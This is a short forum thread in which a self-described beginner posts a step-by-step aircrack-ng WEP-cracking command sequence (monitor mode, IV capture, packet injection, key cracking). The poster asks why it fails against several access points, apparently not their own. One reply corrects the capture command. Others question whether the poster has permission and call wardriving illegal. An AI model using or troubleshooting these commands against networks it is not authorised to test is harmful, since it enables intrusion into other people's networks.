airodump-ng -c (ch) -w (wep) --bssid (ap mac) mon0
Should be something like airodump-ng --ivs -c X --bssid X mon0 to cap valid IVS on airodump. :P
Hello, i'm new in using backtrack at this moment. I've been testing different wep secured ap's but as a begginer. Most of them are down until 30.000 iv's.
Yesterday i've tested a new wep AP and after crossing 100.000 iv's I left the pc open and went to bed. Surprisingly in the morning i had over 8.6 mil IVand still no key.
I've used:
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c (ch) -w (wep) --bssid (ap mac) mon0
aireplay-ng -1 0 -a (ap mac) mon0
*got a succesful injection
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff: -b (ap mac) mon0
* used a small packet size byte
aircrack-ng -n 64 -b (ap mac) wep-01.cap
It's something i've done wrong ?
Pls help

Do you have permission to be testing all of these WEP APs?? This sounds like you're War Driving your Local Area's WEP Networks Which Illegal and you cannot Post for Advise here if you are!

This is an interesting fact, you claim to test secured access points and you also claim that you are a beginner.
Did you receive permission to test those access points ? If yes did you tell the owners you are a beginner ?
